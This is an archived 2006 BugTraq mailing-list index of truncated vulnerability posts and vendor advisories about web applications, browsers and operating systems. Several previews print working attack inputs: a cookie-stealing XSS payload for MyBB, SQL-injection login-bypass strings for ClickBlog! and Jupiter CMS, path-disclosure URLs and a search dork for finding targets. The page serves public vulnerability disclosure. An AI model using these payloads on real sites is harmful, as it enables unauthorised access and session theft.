BugTraq
Google Search API Worms 2006-09-14
pdp (architect) (pdp gnucitizen googlemail com)
http://www.gnucitizen.org/blog/google-search-api-worms

The service that concerns me the most is Google AJAX Search API, the
new JavaScript powered search widget. In this article I cover the
potential problems with Google AJAX Search API and how it can be used
by web worms to propagate.

--
pdp (ar

MyBB Full path and Cross site scripting vulnerabilities 2006-09-15
security soqor net
Hello

Title : MyBB Full path and Cross site scripting vulnerabilities

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net

xss

archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][
name]=<script>alert(document.cookie);</

Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities 2006-09-13
x17 hotmail fr
# Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities

# Discovered By : ThE__LeO ;

# Software : Signkorn Guestbook v 1.3 ;

# Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"

# Exploit : http://Www.Exam

RE: IE ActiveX 0day? 2006-09-15
Hayes, Bill (Bill Hayes owh com)
It looks like the flaw is a buffer overflow and not a memory corruption
error.

Initially, FrSIRT has issued an advisory, "Microsoft Internet Explorer
"daxctle.ocx" KeyFrame Memory Corruption Vulnerability", detailing a new
zero-day Internet Explorer exploit. The exploit is reportedly successful
usi

Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection 2006-09-14
ajannhwt hotmail com
ENGLISH

# Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author : ajann

# Exploit;

[CODE]

loginprocess.asp:

..

...

dim varUser

dim varPass

varUser=Request.Form("TxtUser") No Secure : )

varPass=Request.Form("TxtPass") No Secure : )

..

...

//Be

ppalCart V(2.5 EE) Remote File Inclusion 2006-09-14
l0x3 hotmail com
+--------------------------------------------------------------------

+

+ ppalCart V(2.5 EE) Remote File Inclusion

+

+-------------------------------------------------------------------

+

+ Affected Software .: Software

+ Version .............: ppalCart 2.5 EE

+ Vendor ...........: ht

ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection 2006-09-14
ajannhwt hotmail com
ENGLISH

# Title : ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

# Author : ajann

# Exploit;

//Before join login page

http://[target]/[path]/default.asp

Username : ' or '

Password : ' or ' and Login Ok

# ajann,Turkey

Re: RSA SecurID SID800 Token vulnerable by design 2006-09-14
vin theworld com
On Bugtraq and several other security forums, Hadmut Danisch <hadmut (at) danisch (dot) de>, a respected German information security analyst, recently published a harsh critique of one optional feature in the SID800, one of the newest of the six SecurID authentication tokens -- some with slightly different for

[SECURITY] [DSA 1177-1] New usermin packages fix denial of service 2006-09-15
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1177-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
September 15th, 2006

PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit 2006-09-15
Saudi unix hotmail com
#====================================================================

#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit

#====================================================================

#

#Critical Level : Dangerous

#

#By Saudi Hackrz

#

#http://www.popphoto.com/

#

#============

[SECURITY] [DSA 1160-2] New Mozilla packages fix several vulnerabilities 2006-09-15
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1160-2 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
September 15th, 2006

Fwd: IE ActiveX 0day? 2006-09-15
Tyop Tyip (tyoptyop gmail com) (1 replies)
Does someone have more information about a 0day on ActiveX?
Here's my links:

http://www.milw0rm.com/exploits/2358
http://blogs.securiteam.com/index.php/archives/600
http://www.xsec.org/

--
Tyop?

Re: Fwd: IE ActiveX 0day? 2006-09-15
H D Moore (sflist digitaloffense net)
Jupiter CMS Multiple injections 2006-09-15
security soqor net
Hello,,

Jupiter CMS Sql injections ,full path and xss vulnerabilities

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net

if magic_quotes_gpc = off

login with

user name :

' or id=1/*

or

' or authorization =

Hackers to Hackers Conference III - Call for Papers 2006-09-14
Rodrigo Rubira Branco (BSDaemon) (rodrigo kernelhacking com)
General Objectives

The H2HC has as its main objective to offer a national and international
conference for Brazilian hackers, strongly the ethical of hacking.

We have as our mission to change and demystify the word hacker from the
pejorative sense to show the hacker as who works in software research and
sec

mcLinksCounter v1.1 - Remote File Include Vulnerabilities 2006-09-14
erne ernealizm com
# ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----

# mcLinksCounter v1.1 - Remote File Include Vulnerabilities

# site : http://www.comscripts.com/jump.php?action=script&id=847

# Script : mcLinksCounter v1.1

# Credits : ERNE

# Contact : erne (at) ernealizm (dot) com and irc.gigachat.n

Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities 2006-09-14
Steven M. Christey (coley mitre org)

l0x3 (at) hotmail (dot) com,

There have been many vulnerability reports like this, and they don't
seem to make sense.

You are the first one to say that you actually tested it, and it
worked. Because you called it 'weird', you also clearly understand
that this does not make sense.

Maybe it's a bug in a ver

Re: Snitz Forums 2000 v3.4.06 2006-09-13
bob gmail com
Vendor has supplied a fix: http://forum.snitz.com/forum/topic.asp?TOPIC_ID=62773

Layered Defense Advisory :Symantec AntiVirus Corporate Edition Format String Vulnerability 2006-09-14
dh layereddefense com
==================================================

Layered Defense Advisory 13 September 2006

==================================================

1) Affected Software

Symantec AntiVirus Corporate Edition 10.0

Symantec AntiVirus Corporate Edition 9.0

Symantec AntiVirus Corporate Edition 8

SolpotCrew Advisory #9 - phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion 2006-09-14
chris_hasibuan yahoo com
#############################SolpotCrew Community################################

#

# phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion

#

# Download file : http://www.furor-normannicus.de/phpQuiz/download/phpQuiz.zip

#

########################################

SIP over TLS: X.509 peer authentication vulnerability in Ingate products 2006-09-14
Per Cederqvist (ceder ingate com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SIP over TLS: X.509 peer authentication vulnerability in Ingate products
========================================================================

Product: Ingate Firewall and Ingate SIParator
Versions: all current versions
Tracking ID: 2829

Summary
==

Fullpath disclosure in Blue Magic Board 5.5 2006-09-14
hack2prison yahoo com
Blue Magic Board (BMB) is a nice forum system written by http://bmforum.com

Some files error and show the full path. I tested the newest version; maybe all older versions are infected.

http://domain.ext/[bmb_path]/footer.php

http://domain.ext/[bmb_path]/header.php

http://domain.ext/[bmb_path]/include/db/db_

Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities 2006-09-14
Carsten Eilers (ceilers-lists gmx de) (1 replies)
Hi,

(M.o.H.a.J.a.L.i) wrote on Thu, 14 Sep 2006 02:17:53 +0300:

>Have You Tried it before commenting???

Of course, and include_location is initialized in 1.20
and 1.30.

>we know it has been initialized but it weirdly works...

Which PHP/Webserver/System?

Maybe it depends on special versions?

Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit 2006-09-13
saudi unix hotmail com
#====================================================================

#Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

#====================================================================

#

#Critical Level : Dangerous

#

#By Saudi Hackrz

#

#http://www.reamdaysoft.com

#ht

PhotoPost =>4.6 (PP_PATH) Remote File Inclusion Exploit 2006-09-14
saudi unix hotmail com
#====================================================================

#PhotoPost =>4.6 (PP_PATH) Remote File Inclusion Exploit

#====================================================================

#

#Critical Level : Dangerous

#

#By Saudi Hackrz

#

#http://www.popphoto.com/

#

#=============

[security bulletin] HPSBUX02126 SSRT051019 rev.1 - HP-UX running X.25 Local Denial of Service (Dos) 2006-09-14
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00705202
Version: 1

HPSBUX02126 SSRT051019 rev.1 - HP-UX running X.25 Local Denial of Service (Dos)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

R

[USN-346-2] Fixed linux-restricted-modules-2.6.15 for previous Linux kernel update 2006-09-14
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-346-2 September 14, 2006
linux-restricted-modules-2.6.15 regression fix
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LT

Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities 2006-09-14
Secunia Research (vuln-remove secunia com)
======================================================================

Secunia Research 14/09/2006

- Tagger LE PHP "eval()" Injection Vulnerabilities -

======================================================================
Table of Contents

Affected Software.........

XSS vulnerability in Blojsom 2006-09-14
p3rlhax gmail com


I. BACKGROUND

Taken from the Blojsom Website :

"Blojsom is a Java-based, full-featured, multi-blog, multi-user software package that was inspired by blosxom. blojsom aims to retain a simplicity in design while adding flexibility in areas such as the flavors, templating, plugins, and the abil

Copyright 2010, SecurityFocus